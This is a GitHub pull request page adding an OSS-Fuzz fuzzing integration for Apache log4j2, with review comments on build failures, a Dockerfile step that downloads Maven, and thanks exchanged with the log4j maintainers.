Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[log4j2] intitial integration #7016

Merged
merged 3 commits into from
Dec 15, 2021
Merged

[log4j2] intitial integration #7016

merged 3 commits into from
Dec 15, 2021

Conversation

0roman
Copy link
Contributor

@0roman 0roman commented Dec 15, 2021

inferno-chromium
inferno-chromium reviewed Dec 15, 2021
View reviewed changes
projects/log4j2/project.yaml Outdated
@@ -0,0 +1,11 @@
homepage: "https://logging.apache.org/log4j/2.x/"
language: jvm
primary_contact: "?"
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please just move one of your email to primary contact for you. We plan to start conversations with log4j team soon.

projects/log4j2/build.sh
@@ -0,0 +1,51 @@
#!/bin/bash -eu
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can you please check the CI build failure

@fmeum fmeum force-pushed the log4j2 branch 2 times, most recently from 889998f to 2008abb Compare December 15, 2021 17:52
@inferno-chromium
Copy link
Collaborator

Build compile is fine now, just the archiving part is failing

+ javac -cp /out/log4j-core.jar:/out/log4j-api.jar::/usr/local/lib/jazzer_api_deploy.jar:/out /src/Log4jFuzzer.java
/src/Log4jFuzzer.java:39: error: cannot find symbol
        DefaultConfigurationBuilder configBuilder = newDefaultConfigurationBuilder();
                                                    ^
  symbol:   method newDefaultConfigurationBuilder()
  location: class Log4jFuzzer
/src/Log4jFuzzer.java:40: error: cannot access Builder
        AppenderComponentBuilder fuzzingAppender = configBuilder.newAppender("nullAppender", FileAppender.PLUGIN_NAME);
                                                                ^
  class file for org.apache.logging.log4j.plugins.util.Builder not found
2 errors
ERROR:root:Building fuzzers failed.

Can verify build works locally using https://google.github.io/oss-fuzz/advanced-topics/reproducing/#reproducing-build-failures

jonathanmetzman
jonathanmetzman approved these changes Dec 15, 2021
View reviewed changes
Copy link
Contributor

@jonathanmetzman jonathanmetzman left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM

projects/log4j2/Dockerfile

FROM gcr.io/oss-fuzz-base/base-builder-jvm

RUN curl -L https://downloads.apache.org/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.zip -o maven.zip && \
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

nit: Probably should go in /work

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can come in next PR

@jonathanmetzman jonathanmetzman enabled auto-merge (squash) December 15, 2021 18:46
@inferno-chromium
Copy link
Collaborator

inferno-chromium commented Dec 15, 2021
edited by jonathanmetzman
Loading

@garydgregory @vy @rgoers - We would like to provide fuzz testing for log4j2 as part of OSS-Fuzz.
Code Intelligence (@fmeum and @0roman) have written the fuzzer and demonstrated that is capable of finding the log4shell vulnerability. OSS-Fuzz is a community fuzzing service serving over 500 OSS projects (e.g. openssl, ffmpeg, etc). There is no new work needed here, although you can apply for rewards to maintain and improve fuzzers, please see https://google.github.io/oss-fuzz/getting-started/integration-rewards/. Thank you for maintaining this library for the community, we truly appreciate all your efforts.

@jonathanmetzman jonathanmetzman merged commit c2f70d8 into google:master Dec 15, 2021
@fmeum fmeum deleted the log4j2 branch December 15, 2021 18:56
@vy
Copy link

vy commented Dec 20, 2021

@inferno-chromium That is simply awesome! Thanks so much! As you might imagine 😅, the entire crew is swamped with other priorities. Would you mind sharing this news via an email to the dev@logging.apache.org as well, please?

@inferno-chromium
Copy link
Collaborator

@inferno-chromium That is simply awesome! Thanks so much! As you might imagine 😅, the entire crew is swamped with other priorities. Would you mind sharing this news via an email to the dev@logging.apache.org as well, please?

@vy - Yes, we plan to sync on this early Jan once fires are out. Hope you guys can relax from Christmas, thanks again for amazing work on incident response.

MartinPetkov pushed a commit to MartinPetkov/oss-fuzz that referenced this pull request Aug 15, 2022
@0roman @MartinPetkov
[log4j2] intitial integration (google#7016)
2c02b9e
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@inferno-chromium inferno-chromium inferno-chromium left review comments

@jonathanmetzman jonathanmetzman jonathanmetzman approved these changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@0roman @inferno-chromium @vy @jonathanmetzman @fmeum